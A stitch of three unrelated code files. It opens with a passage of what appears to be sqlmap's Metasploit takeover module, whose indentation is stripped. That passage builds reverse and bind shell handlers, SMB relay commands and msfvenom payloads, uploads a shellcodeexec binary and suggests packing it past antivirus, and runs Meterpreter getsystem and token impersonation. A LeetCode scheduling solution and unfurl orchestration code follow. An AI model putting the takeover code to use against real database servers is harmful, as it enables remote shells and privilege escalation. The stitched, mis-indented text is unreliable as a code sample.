def _selectRhost(self):
if self.connectionStr.startswith("bind"):
message = "what is the back-end DBMS address? [Enter for '%s' (detected)] " % self.remoteIP
address = readInput(message, default=self.remoteIP)
if not address:
address = self.remoteIP
return address
elif self.connectionStr.startswith("reverse"):
return None
else:
raise SqlmapDataException("unexpected connection type")
def _selectLhost(self):
if self.connectionStr.startswith("reverse"):
message = "what is the local address? [Enter for '%s' (detected)] " % self.localIP
address = readInput(message, default=self.localIP)
if not address:
address = self.localIP
return address
elif self.connectionStr.startswith("bind"):
return None
else:
raise SqlmapDataException("unexpected connection type")
def _selectConnection(self):
return self._skeletonSelection("connection type", self._msfConnectionsList)
def _prepareIngredients(self, encode=True):
self.connectionStr = self._selectConnection()
self.lhostStr = self._selectLhost()
self.rhostStr = self._selectRhost()
self.portStr = self._selectPort()
self.payloadStr = self._selectPayload()
self.encoderStr = self._selectEncoder(encode)
self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr)
def _forgeMsfCliCmd(self, exitfunc="process"):
if kb.oldMsf:
self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
self._cliCmd += " EXITFUNC=%s" % exitfunc
self._cliCmd += " LPORT=%s" % self.portStr
if self.connectionStr.startswith("bind"):
self._cliCmd += " RHOST=%s" % self.rhostStr
elif self.connectionStr.startswith("reverse"):
self._cliCmd += " LHOST=%s" % self.lhostStr
else:
raise SqlmapDataException("unexpected connection type")
if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
self._cliCmd += " DisableCourtesyShell=true"
self._cliCmd += " E"
else:
self._cliCmd = "%s -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr)
self._cliCmd += "; set EXITFUNC %s" % exitfunc
self._cliCmd += "; set LPORT %s" % self.portStr
if self.connectionStr.startswith("bind"):
self._cliCmd += "; set RHOST %s" % self.rhostStr
elif self.connectionStr.startswith("reverse"):
self._cliCmd += "; set LHOST %s" % self.lhostStr
else:
raise SqlmapDataException("unexpected connection type")
if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
self._cliCmd += "; set DisableCourtesyShell true"
self._cliCmd += "; exploit'"
def _forgeMsfCliCmdForSmbrelay(self):
self._prepareIngredients(encode=False)
if kb.oldMsf:
self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
self._cliCmd += " EXITFUNC=thread"
self._cliCmd += " LPORT=%s" % self.portStr
self._cliCmd += " SRVHOST=%s" % self.lhostStr
self._cliCmd += " SRVPORT=%s" % self._selectSMBPort()
if self.connectionStr.startswith("bind"):
self._cliCmd += " RHOST=%s" % self.rhostStr
elif self.connectionStr.startswith("reverse"):
self._cliCmd += " LHOST=%s" % self.lhostStr
else:
raise SqlmapDataException("unexpected connection type")
self._cliCmd += " E"
else:
self._cliCmd = "%s -x 'use windows/smb/smb_relay; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr)
self._cliCmd += "; set EXITFUNC thread"
self._cliCmd += "; set LPORT %s" % self.portStr
self._cliCmd += "; set SRVHOST %s" % self.lhostStr
self._cliCmd += "; set SRVPORT %s" % self._selectSMBPort()
if self.connectionStr.startswith("bind"):
self._cliCmd += "; set RHOST %s" % self.rhostStr
elif self.connectionStr.startswith("reverse"):
self._cliCmd += "; set LHOST %s" % self.lhostStr
else:
raise SqlmapDataException("unexpected connection type")
self._cliCmd += "; exploit'"
def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
if kb.oldMsf:
self._payloadCmd = self._msfPayload
else:
self._payloadCmd = "%s -p" % self._msfVenom
self._payloadCmd += " %s" % self.payloadConnStr
self._payloadCmd += " EXITFUNC=%s" % exitfunc
self._payloadCmd += " LPORT=%s" % self.portStr
if self.connectionStr.startswith("reverse"):
self._payloadCmd += " LHOST=%s" % self.lhostStr
elif not self.connectionStr.startswith("bind"):
raise SqlmapDataException("unexpected connection type")
if Backend.isOs(OS.LINUX) and conf.privEsc:
self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true"
if kb.oldMsf:
if extra == "BufferRegister=EAX":
self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format)
if extra is not None:
self._payloadCmd += " %s" % extra
else:
self._payloadCmd += " X > \"%s\"" % outFile
else:
if extra == "BufferRegister=EAX":
self._payloadCmd += " -a x86 -e %s -f %s" % (self.encoderStr, format)
if extra is not None:
self._payloadCmd += " %s" % extra
self._payloadCmd += " > \"%s\"" % outFile
else:
self._payloadCmd += " -f exe > \"%s\"" % outFile
def _runMsfCliSmbrelay(self):
self._forgeMsfCliCmdForSmbrelay()
infoMsg = "running Metasploit Framework command line "
infoMsg += "interface locally, please wait.."
logger.info(infoMsg)
logger.debug("executing local command: %s" % self._cliCmd)
self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False)
def _runMsfCli(self, exitfunc):
self._forgeMsfCliCmd(exitfunc)
infoMsg = "running Metasploit Framework command line "
infoMsg += "interface locally, please wait.."
logger.info(infoMsg)
logger.debug("executing local command: %s" % self._cliCmd)
self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False)
def _runMsfShellcodeRemote(self):
infoMsg = "running Metasploit Framework shellcode "
infoMsg += "remotely via UDF 'sys_bineval', please wait.."
logger.info(infoMsg)
self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval")
def _runMsfShellcodeRemoteViaSexec(self):
infoMsg = "running Metasploit Framework shellcode remotely "
infoMsg += "via shellcodeexec, please wait.."
logger.info(infoMsg)
if not Backend.isOs(OS.WINDOWS):
self.execCmd("chmod +x %s" % self.shellcodeexecRemote, silent=True)
cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString)
else:
cmd = "\"%s\" %s" % (self.shellcodeexecRemote, self.shellcodeString)
self.execCmd(cmd, silent=True)
def _loadMetExtensions(self, proc, metSess):
if not Backend.isOs(OS.WINDOWS):
return
send_all(proc, "use espia\n")
send_all(proc, "use incognito\n")
# This extension is loaded by default since Metasploit > 3.7
#send_all(proc, "use priv\n")
# This extension freezes the connection on 64-bit systems
#send_all(proc, "use sniffer\n")
send_all(proc, "sysinfo\n")
send_all(proc, "getuid\n")
if conf.privEsc:
print
infoMsg = "trying to escalate privileges using Meterpreter "
infoMsg += "'getsystem' command which tries different "
infoMsg += "techniques, including kitrap0d"
logger.info(infoMsg)
send_all(proc, "getsystem\n")
infoMsg = "displaying the list of Access Tokens availables. "
infoMsg += "Choose which user you want to impersonate by "
infoMsg += "using incognito's command 'impersonate_token' if "
infoMsg += "'getsystem' does not success to elevate privileges"
logger.info(infoMsg)
send_all(proc, "list_tokens -u\n")
send_all(proc, "getuid\n")
def _controlMsfCmd(self, proc, func):
initialized = False
start_time = time.time()
stdin_fd = sys.stdin.fileno()
while True:
returncode = proc.poll()
if returncode is None:
# Child hasn't exited yet
pass
else:
logger.debug("connection closed properly")
return returncode
try:
if IS_WIN:
timeout = 3
inp = ""
_ = time.time()
while True:
if msvcrt.kbhit():
char = msvcrt.getche()
if ord(char) == 13: # enter_key
break
elif ord(char) >= 32: # space_char
inp += char
if len(inp) == 0 and (time.time() - _) > timeout:
break
if len(inp) > 0:
try:
send_all(proc, inp)
except (EOFError, IOError):
# Probably the child has exited
pass
else:
ready_fds = select.select([stdin_fd], [], [], 1)
if stdin_fd in ready_fds[0]:
try:
send_all(proc, blockingReadFromFD(stdin_fd))
except (EOFError, IOError):
# Probably the child has exited
pass
out = recv_some(proc, t=.1, e=0)
blockingWriteToFD(sys.stdout.fileno(), out)
# For --os-pwn and --os-bof
pwnBofCond = self.connectionStr.startswith("reverse")
pwnBofCond &= "Starting the payload handler" in out
# For --os-smbrelay
smbRelayCond = "Server started" in out
if pwnBofCond or smbRelayCond:
func()
timeout = time.time() - start_time > METASPLOIT_SESSION_TIMEOUT
if not initialized:
match = re.search("Meterpreter session ([\d]+) opened", out)
if match:
self._loadMetExtensions(proc, match.group(1))
if "shell" in self.payloadStr:
send_all(proc, "whoami\n" if Backend.isOs(OS.WINDOWS) else "uname -a ; id\n")
time.sleep(2)
initialized = True
elif timeout:
proc.kill()
errMsg = "timeout occurred while attempting "
errMsg += "to open a remote session"
raise SqlmapGenericException(errMsg)
if conf.liveTest and timeout:
if initialized:
send_all(proc, "exit\n")
time.sleep(2)
else:
proc.kill()
except (EOFError, IOError, select.error):
return proc.returncode
def createMsfShellcode(self, exitfunc, format, extra, encode):
infoMsg = "creating Metasploit Framework multi-stage shellcode "
logger.info(infoMsg)
self._randStr = randomStr(lowercase=True)
self._shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self._randStr)
Metasploit._initVars(self)
self._prepareIngredients(encode=encode)
self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, extra)
logger.debug("executing local command: %s" % self._payloadCmd)
process = execute(self._payloadCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False)
dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
pollProcess(process)
payloadStderr = process.communicate()[1]
match = re.search("(Total size:|Length:|succeeded with size) ([\d]+)", payloadStderr)
if match:
payloadSize = int(match.group(2))
if extra == "BufferRegister=EAX":
payloadSize = payloadSize / 2
debugMsg = "the shellcode size is %d bytes" % payloadSize
logger.debug(debugMsg)
else:
errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", " ").replace("\r", "")
raise SqlmapFilePathException(errMsg)
self._shellcodeFP = open(self._shellcodeFilePath, "rb")
self.shellcodeString = self._shellcodeFP.read()
self._shellcodeFP.close()
os.unlink(self._shellcodeFilePath)
def uploadShellcodeexec(self, web=False):
self.shellcodeexecLocal = os.path.join(paths.SQLMAP_EXTRAS_PATH, "shellcodeexec")
if Backend.isOs(OS.WINDOWS):
self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32")
content = decloak(self.shellcodeexecLocal)
if SHELLCODEEXEC_RANDOM_STRING_MARKER in content:
content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER)))
_ = cloak(data=content)
handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32")
os.close(handle)
with open(self.shellcodeexecLocal, "w+b") as f:
f.write(_)
else:
self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch())
__basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "")
self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename)
self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote))
logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote)
if web:
written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal)
else:
written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True)
if written is not True:
errMsg = "there has been a problem uploading shellcodeexec, it "
errMsg += "looks like the binary file has not been written "
errMsg += "on the database underlying file system or an AV has "
errMsg += "flagged it as malicious and removed it. In such a case "
errMsg += "it is recommended to recompile shellcodeexec with "
errMsg += "slight modification to the source code or pack it "
errMsg += "with an obfuscator software"
logger.error(errMsg)
return False
else:
logger.info("shellcodeexec successfully uploaded")
return True
def pwn(self, goUdf=False):
if goUdf:
exitfunc = "thread"
func = self._runMsfShellcodeRemote
else:
exitfunc = "process"
func = self._runMsfShellcodeRemoteViaSexec
self._runMsfCli(exitfunc=exitfunc)
if self.connectionStr.startswith("bind"):
func()
debugMsg = "Metasploit Framework command line interface exited "
debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, func)
logger.debug(debugMsg)
if not goUdf:
time.sleep(1)
self.delRemoteFile(self.shellcodeexecRemote)
def smb(self):
Metasploit._initVars(self)
self._randFile = "tmpu%s.txt" % randomStr(lowercase=True)
self._runMsfCliSmbrelay()
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self._randFile)
else:
self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self._randFile)
debugMsg = "Metasploit Framework console exited with return "
debugMsg += "code %s" % self._controlMsfCmd(self._msfCliProc, self.uncPathRequest)
logger.debug(debugMsg)
def bof(self):
self._runMsfCli(exitfunc="seh")
if self.connectionStr.startswith("bind"):
self.spHeapOverflow()
debugMsg = "Metasploit Framework command line interface exited "
debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, self.spHeapOverflow)
logger.debug(debugMsg)
|
the-stack_106_16986
|
import bisect
import math
from functools import lru_cache
from typing import List
class Solution:
    def maxValue(self, events: List[List[int]], k: int) -> int:
        # sort by start day; dp(i, k) = best total value attainable from events[i:]
        # when at most k more events may be attended
        e = sorted(events)
@lru_cache(None)
def dp(i, k):
if k == 0 or i == len(e):
return 0
# binary search events to find the first index j s.t. e[j][0] > e[i][1]
j = bisect.bisect(e, [e[i][1], math.inf, math.inf], i + 1)
return max(dp(i + 1, k), e[i][2] + dp(j, k - 1))
return dp(0, k)
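# Minimal usage sketch (illustrative; not part of the original solution). Events are
# given as [startDay, endDay, value]; with k = 2, attending [1, 2, 4] and [3, 4, 3]
# yields the maximum total value of 7.
if __name__ == "__main__":
    print(Solution().maxValue([[1, 2, 4], [3, 4, 3], [2, 3, 1]], 2))  # expected output: 7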
|
the-stack_106_16987
|
# Copyright (c) 2021 Adam Souzis
# SPDX-License-Identifier: MIT
import collections
import re
import six
import shlex
from .util import (
lookup_class,
load_module,
find_schema_errors,
UnfurlError,
UnfurlTaskError,
)
from .result import serialize_value
from .support import Defaults
import logging
logger = logging.getLogger("unfurl")
# we want ConfigurationSpec to be standalone and easily serializable
class ConfigurationSpec:
@classmethod
def getDefaults(cls):
return dict(
className=None,
majorVersion=0,
minorVersion="",
workflow=Defaults.workflow,
timeout=None,
operation_host=None,
environment=None,
inputs=None,
inputSchema=None,
preConditions=None,
postConditions=None,
primary=None,
dependencies=None,
outputs=None,
interface=None,
)
def __init__(
self,
name,
operation,
className=None,
majorVersion=0,
minorVersion="",
workflow=Defaults.workflow,
timeout=None,
operation_host=None,
environment=None,
inputs=None,
inputSchema=None,
preConditions=None,
postConditions=None,
primary=None,
dependencies=None,
outputs=None,
interface=None,
):
assert name and className, "missing required arguments"
self.name = name
self.operation = operation
self.className = className
self.majorVersion = majorVersion
self.minorVersion = minorVersion
self.workflow = workflow
self.timeout = timeout
self.operation_host = operation_host
self.environment = environment
self.inputs = inputs or {}
self.inputSchema = inputSchema
self.outputs = outputs or {}
self.preConditions = preConditions
self.postConditions = postConditions
self.artifact = primary
self.dependencies = dependencies
self.interface = interface
def find_invalidate_inputs(self, inputs):
if not self.inputSchema:
return []
return find_schema_errors(serialize_value(inputs), self.inputSchema)
# XXX same for postConditions
def find_invalid_preconditions(self, target):
if not self.preConditions:
return []
# XXX this should be like a Dependency object
expanded = serialize_value(target.attributes)
return find_schema_errors(expanded, self.preConditions)
def create(self):
klass = lookup_class(self.className)
if not klass:
raise UnfurlError(f"Could not load configurator {self.className}")
else:
return klass(self)
def should_run(self):
return Defaults.shouldRun
    def copy(self, **mods):
        args = self.__dict__.copy()
        # the "artifact" attribute corresponds to the "primary" constructor argument
        args["primary"] = args.pop("artifact", None)
        args.update(mods)
        return ConfigurationSpec(**args)
def __eq__(self, other):
if not isinstance(other, ConfigurationSpec):
return False
return (
self.name == other.name
and self.operation == other.operation
and self.className == other.className
and self.majorVersion == other.majorVersion
and self.minorVersion == other.minorVersion
and self.workflow == other.workflow
and self.timeout == other.timeout
and self.environment == other.environment
and self.inputs == other.inputs
and self.inputSchema == other.inputSchema
and self.outputs == other.outputs
and self.preConditions == other.preConditions
and self.postConditions == other.postConditions
and self.interface == other.interface
)
class PlanRequest:
error = None
future_dependencies = ()
task = None
def __init__(self, target):
self.target = target
@property
def root(self):
return self.target.root if self.target else None
def update_future_dependencies(self, completed):
return self.future_dependencies
def get_operation_artifacts(self):
return []
class TaskRequest(PlanRequest):
"""
Yield this to run a child task. (see :py:meth:`unfurl.configurator.TaskView.create_sub_task`)
"""
def __init__(
self,
configSpec,
target,
reason,
persist=False,
required=None,
startState=None,
):
super().__init__(target)
self.configSpec = configSpec
self.reason = reason
self.persist = persist
self.required = required
self.error = configSpec.name == "#error"
self.startState = startState
self.task = None
def _get_artifact_plan(self, artifact):
# the artifact has an interface so it needs to be installed on the operation_host
if artifact and artifact.get_interfaces():
            # the same global artifact can have different local names when declared on a node template,
            # but it is uniquely identified by (file, repository), so use that to generate a unique node template name
name = "__artifact__" + artifact.get_name_from_artifact_spec(
artifact.as_import_spec()
)
operation_host = (
find_operation_host(self.target, self.configSpec.operation_host)
or self.target.root
)
existing = operation_host.root.find_instance(name)
if existing:
if existing.operational:
return None
else:
return JobRequest([existing])
else:
if not operation_host.template.spec.get_template(name):
# template isn't defined, define inline
artifact_tpl = artifact.toscaEntityTemplate.entity_tpl
template = dict(
name=name,
directives=["protected"],
type="unfurl.nodes.ArtifactInstaller",
artifacts={"install": artifact_tpl},
)
artifact_type = artifact_tpl["type"]
if (
artifact_type
not in operation_host.template.spec.template.topology_template.custom_defs
):
# operation_host must be in an external ensemble that doesn't have the type def
artifact_type_def = self.target.template.spec.template.topology_template.custom_defs[
artifact_type
]
template["custom_types"] = {artifact_type: artifact_type_def}
else:
template = name
return JobRequest(
[operation_host],
update=dict(
name=name,
parent=operation_host.name,
template=template,
attributes=artifact.properties,
),
)
return None
def get_operation_artifacts(self):
artifacts = []
if self.configSpec.dependencies:
for artifact in self.configSpec.dependencies:
jobRequest = self._get_artifact_plan(artifact)
if jobRequest:
artifacts.append(jobRequest)
jobRequest = self._get_artifact_plan(self.configSpec.artifact)
if jobRequest:
artifacts.append(jobRequest)
return artifacts
@property
def name(self):
if self.configSpec.operation:
name = self.configSpec.operation
else:
name = self.configSpec.name
if self.reason and self.reason not in name:
return name + " (reason: " + self.reason + ")"
return name
def update_future_dependencies(self, completed):
self.future_dependencies = [
fr for fr in self.future_dependencies if fr not in completed
]
return self.future_dependencies
def _summary_dict(self, include_rendered=True):
summary = dict(
operation=self.configSpec.operation or self.configSpec.name,
reason=self.reason,
)
rendered = {}
if self.task and self.task._workFolders:
for name, wf in self.task._workFolders.items():
rendered[name] = wf.cwd
if include_rendered:
summary["rendered"] = rendered
return summary
def __repr__(self):
state = " " + (self.target.state and self.target.state.name or "")
return (
f"TaskRequest({self.target}({self.target.status.name}{state}):{self.name})"
)
class SetStateRequest(PlanRequest):
def __init__(self, target, state):
super().__init__(target)
self.set_state = state
@property
def name(self):
return self.set_state
def _summary_dict(self):
return dict(set_state=self.set_state)
class TaskRequestGroup(PlanRequest):
def __init__(self, target, workflow):
super().__init__(target)
self.workflow = workflow
self.children = []
@property
def future_dependencies(self):
future_dependencies = []
for req in self.children:
future_dependencies.extend(req.future_dependencies)
return future_dependencies
def update_future_dependencies(self, completed):
future_dependencies = []
for req in self.children:
future_dependencies.extend(req.update_future_dependencies(completed))
return future_dependencies
def get_operation_artifacts(self):
artifacts = []
for req in self.children:
artifacts.extend(req.get_operation_artifacts())
return artifacts
def __repr__(self):
return f"TaskRequestGroup({self.target}:{self.workflow}:{self.children})"
class JobRequest:
"""
Yield this to run a child job.
"""
def __init__(self, resources, errors=None, update=None):
self.instances = resources
self.errors = errors or []
self.update = update
def get_instance_specs(self):
if self.update:
return [self.update]
else:
return [r.name for r in self.instances]
@property
def name(self):
if self.update:
return self.update["name"]
elif self.instances:
return self.instances[0].name
else:
return ""
@property
def target(self):
# XXX replace instances with target
if self.instances:
return self.instances[0]
else:
return None
@property
def root(self):
if self.instances:
# all instances need the same root
assert (
len(self.instances) == 1
or len(set(id(i.root) for i in self.instances)) == 1
)
return self.instances[0].root
else:
return None
def __repr__(self):
return f"JobRequest({self.name})"
def find_operation_host(target, operation_host):
# SELF, HOST, ORCHESTRATOR, SOURCE, TARGET
if not operation_host or operation_host in ["localhost", "ORCHESTRATOR"]:
return target.root.find_instance_or_external("localhost")
if operation_host == "SELF":
return target
if operation_host == "HOST":
# XXX should search all ancestors to find parent that can handle the given operation
# e.g. ansible configurator should find ancestor compute node
return target.parent
if operation_host == "SOURCE":
return target.source
if operation_host == "TARGET":
return target.target
return target.root.find_instance_or_external(operation_host)
def get_render_requests(requests):
# returns requests that can be rendered grouped by its top-most task group
for req in requests:
if isinstance(req, TaskRequestGroup):
for parent, child in get_render_requests(req.children):
yield req, child # yields root as parent
elif isinstance(req, TaskRequest):
yield None, req
elif not isinstance(req, SetStateRequest):
assert not req, f"unexpected type of request: {req}"
def _get_deps(parent, req, liveDependencies, requests):
previous = None
for (root, r) in requests:
if req.target.key == r.target.key:
continue # skip self
        if r.required is not None and not r.required:
continue # skip requests that aren't going to run
if r.target.key in liveDependencies:
if root:
if previous is root or parent is root:
# only yield root once and
# don't consider requests in the same root
continue
previous = root
yield root or r
def set_fulfilled(requests, completed):
# requests, completed are top level requests,
# as is future_dependencies
ready, notReady = [], []
for req in requests:
if req.update_future_dependencies(completed):
notReady.append(req)
else: # list is now empty so request is ready
ready.append(req)
return ready, notReady
def _prepare_request(job, req, errors):
    # req is a TaskRequest to be prepared before rendering
if req.task:
task = req.task
task._attributeManager.attributes = {}
task.target.root.attributeManager = task._attributeManager
else:
task = req.task = job.create_task(req.configSpec, req.target, reason=req.reason)
error = None
try:
proceed, msg = job.should_run_task(task)
if not proceed:
req.required = False
if task._errors:
error = task._errors[0]
logger.debug(
"skipping task %s for instance %s with state %s and status %s: %s",
req.configSpec.operation,
req.target.name,
req.target.state,
req.target.status,
msg,
)
except Exception:
proceed = False
# note: failed rendering may be re-tried later if it has dependencies
error = UnfurlTaskError(task, "should_run_task failed", logging.DEBUG)
if error:
task._inputs = None
task._attributeManager.attributes = {} # rollback changes
errors.append(error)
else:
task.commit_changes()
return proceed
def _render_request(job, parent, req, requests):
    # req is a TaskRequest; requests are (group request, task request) pairs
assert req.task
task = req.task
task._attributeManager.attributes = {}
task.target.root.attributeManager = task._attributeManager
error = None
try:
task.logger.debug("rendering %s %s", task.target.name, task.name)
task.rendered = task.configurator.render(task)
except Exception:
# note: failed rendering may be re-tried later if it has dependencies
error = UnfurlTaskError(task, "Configurator render failed", logging.DEBUG)
if parent and parent.workflow == "undeploy":
# when removing an instance don't worry about depending values changing in the future
deps = []
else:
# key => (instance, list<attribute>)
liveDependencies = task._attributeManager.find_live_dependencies()
# a future request may change the value of these attributes
deps = list(_get_deps(parent, req, liveDependencies, requests))
if deps:
req.future_dependencies = deps
task.logger.debug(
"%s:%s can not render yet, depends on %s",
task.target.name,
req.configSpec.operation,
str(deps),
)
# rollback changes:
task._errors = []
task._inputs = None
task._attributeManager.attributes = {}
task.discard_work_folders()
return deps, None
elif error:
task.fail_work_folders()
task._inputs = None
task._attributeManager.attributes = {} # rollback changes
else:
task.commit_changes()
return deps, error
def _add_to_req_list(reqs, parent, request):
if parent: # only add if we haven't already
if not reqs or reqs[-1] is not parent:
reqs.append(parent)
else:
reqs.append(request)
def do_render_requests(job, requests):
ready, notReady, errors = [], [], []
flattened_requests = list(
(p, r)
for (p, r) in get_render_requests(requests)
if _prepare_request(job, r, errors)
)
render_requests = collections.deque(flattened_requests)
while render_requests:
parent, request = render_requests.popleft()
deps, error = _render_request(job, parent, request, flattened_requests)
if error:
errors.append(error)
if deps:
# remove if we already added the parent
if parent and ready and ready[-1] is parent:
ready.pop()
_add_to_req_list(notReady, parent, request)
elif not parent or not notReady or notReady[-1] is not parent:
# don't add if the parent was placed on the notReady list
_add_to_req_list(ready, parent, request)
return ready, notReady, errors
def _filter_config(opts, config, target):
if opts.readonly and config.workflow != "discover":
return None, "read only"
if opts.requiredOnly and not config.required:
return None, "required"
if opts.instance and target.name != opts.instance:
return None, f"instance {opts.instance}"
if opts.instances and target.name not in opts.instances:
return None, f"instances {opts.instances}"
return config, None
def filter_task_request(jobOptions, req):
configSpec = req.configSpec
configSpecName = configSpec.name
configSpec, filterReason = _filter_config(jobOptions, configSpec, req.target)
if not configSpec:
logger.debug(
"skipping configspec '%s' for '%s': doesn't match filter: '%s'",
configSpecName,
req.target.name,
filterReason,
)
return None # treat as filtered step
return req
def _find_implementation(interface, operation, template):
default = None
for iDef in template.get_interfaces():
if iDef.interfacename == interface or iDef.type == interface:
if iDef.name == operation:
return iDef
if iDef.name == "default":
default = iDef
return default
def find_resources_from_template_name(root, name):
# XXX make faster
for resource in root.get_self_and_descendents():
if resource.template.name == name:
yield resource
def find_parent_template(source):
for rel, req, reqDef in source.relationships:
# special case "host" so it can be declared without full set of relationship / capability types
if rel.type == "tosca.relationships.HostedOn" or "host" in req:
return rel.target
return None
def find_parent_resource(root, source):
parentTemplate = find_parent_template(source.toscaEntityTemplate)
if not parentTemplate:
return root
for parent in find_resources_from_template_name(root, parentTemplate.name):
# XXX need to evaluate matches
return parent
raise UnfurlError(f"could not find instance of template: {parentTemplate.name}")
def create_instance_from_spec(_manifest, target, rname, resourceSpec):
pname = resourceSpec.get("parent")
# get the actual parent if pname is a reserved name:
if pname in [".self", "SELF"]:
resourceSpec["parent"] = target.name
elif pname == "HOST":
resourceSpec["parent"] = target.parent.name if target.parent else "root"
if isinstance(resourceSpec.get("template"), dict):
# inline node template, add it to the spec
tname = resourceSpec["template"].pop("name", rname)
nodeSpec = _manifest.tosca.add_node_template(tname, resourceSpec["template"])
resourceSpec["template"] = nodeSpec.name
if resourceSpec.get("readyState") and "created" not in resourceSpec:
# setting "created" to the target's key indicates that
# the target is responsible for deletion
# if "created" is not defined, set it if readyState is set
resourceSpec["created"] = target.key
if "parent" not in resourceSpec and "template" in resourceSpec:
nodeSpec = _manifest.tosca.get_template(resourceSpec["template"])
parent = find_parent_resource(target.root, nodeSpec)
else:
parent = target.root
# note: if resourceSpec[parent] is set it overrides the parent keyword
return _manifest.create_node_instance(rname, resourceSpec, parent=parent)
def create_task_request(
jobOptions,
operation,
resource,
reason=None,
inputs=None,
startState=None,
operation_host=None,
skip_filter=False,
):
"""implementation can either be a named artifact (including a python configurator class),
or a file path"""
interface, sep, action = operation.rpartition(".")
iDef = _find_implementation(interface, action, resource.template)
if iDef and iDef.name != "default":
# merge inputs
if inputs:
inputs = dict(iDef.inputs, **inputs)
else:
inputs = iDef.inputs or {}
kw = _get_config_spec_args_from_implementation(
iDef, inputs, resource, operation_host
)
else:
kw = None
if kw:
kw["interface"] = interface
if reason:
name = f"for {reason}: {interface}.{action}"
if reason == jobOptions.workflow:
# set the task's workflow instead of using the default ("deploy")
kw["workflow"] = reason
else:
name = f"{interface}.{action}"
configSpec = ConfigurationSpec(name, action, **kw)
logger.debug(
"creating configuration %s with %s to run for %s: %s",
configSpec.name,
configSpec.inputs,
resource.name,
reason or action,
)
else:
errorMsg = f'unable to find an implementation for operation "{action}" on node "{resource.template.name}"'
logger.debug(errorMsg)
return None
req = TaskRequest(
configSpec,
resource,
reason or action,
startState=startState,
)
if skip_filter:
return req
else:
return filter_task_request(jobOptions, req)
def _set_default_command(kw, implementation, inputs):
# is it a shell script or a command line?
shell = inputs.get("shell")
if shell is None:
# no special shell characters
shell = not re.match(r"[\w.-]+\Z", implementation)
operation_host = kw.get("operation_host")
implementation = implementation.lstrip()
if not operation_host or operation_host == "localhost":
className = "unfurl.configurators.shell.ShellConfigurator"
if shell:
shellArgs = dict(command=implementation)
else:
shellArgs = dict(command=[implementation])
else:
className = "unfurl.configurators.ansible.AnsibleConfigurator"
module = "shell" if shell else "command"
playbookTask = dict(cmd=implementation)
cwd = inputs.get("cwd")
if cwd:
playbookTask["chdir"] = cwd
if shell and isinstance(shell, six.string_types):
playbookTask["executable"] = shell
shellArgs = dict(playbook=[{module: playbookTask}])
kw["className"] = className
if inputs:
shellArgs.update(inputs)
kw["inputs"] = shellArgs
def _set_classname(kw, artifact, inputs):
if not artifact: # malformed implementation
return None
implementation = artifact.file
className = artifact.properties.get("className")
if className:
kw["className"] = className
return kw
# see if implementation looks like a python class
if "#" in implementation and len(shlex.split(implementation)) == 1:
path, fragment = artifact.get_path_and_fragment()
mod = load_module(path)
kw["className"] = mod.__name__ + "." + fragment
return kw
elif lookup_class(implementation):
kw["className"] = implementation
return kw
# otherwise assume it's a shell command line
logger.debug("interpreting 'implementation' as a shell command: %s", implementation)
_set_default_command(kw, implementation, inputs)
return kw
def _get_config_spec_args_from_implementation(iDef, inputs, target, operation_host):
implementation = iDef.implementation
kw = dict(inputs=inputs, outputs=iDef.outputs, operation_host=operation_host)
configSpecArgs = ConfigurationSpec.getDefaults()
artifactTpl = None
dependencies = None
if isinstance(implementation, dict):
# operation_instance = find_operation_host(
# target, implementation.get("operation_host") or operation_host
# )
for name, value in implementation.items():
if name == "primary":
artifactTpl = value
elif name == "dependencies":
dependencies = value
elif name in configSpecArgs:
# sets operation_host, environment, timeout
kw[name] = value
else:
# "either because it refers to a named artifact specified in the artifacts section of a type or template,
# or because it represents the name of a script in the CSAR file that contains the definition."
artifactTpl = implementation
# operation_instance = find_operation_host(target, operation_host)
# if not operation_instance:
# operation_instance = operation_instance or target.root
base_dir = getattr(iDef.value, "base_dir", iDef._source)
if artifactTpl:
artifact = target.template.find_or_create_artifact(artifactTpl, base_dir)
else:
artifact = None
kw["primary"] = artifact
if dependencies:
kw["dependencies"] = [
target.template.find_or_create_artifact(artifactTpl, base_dir)
for artifactTpl in dependencies
]
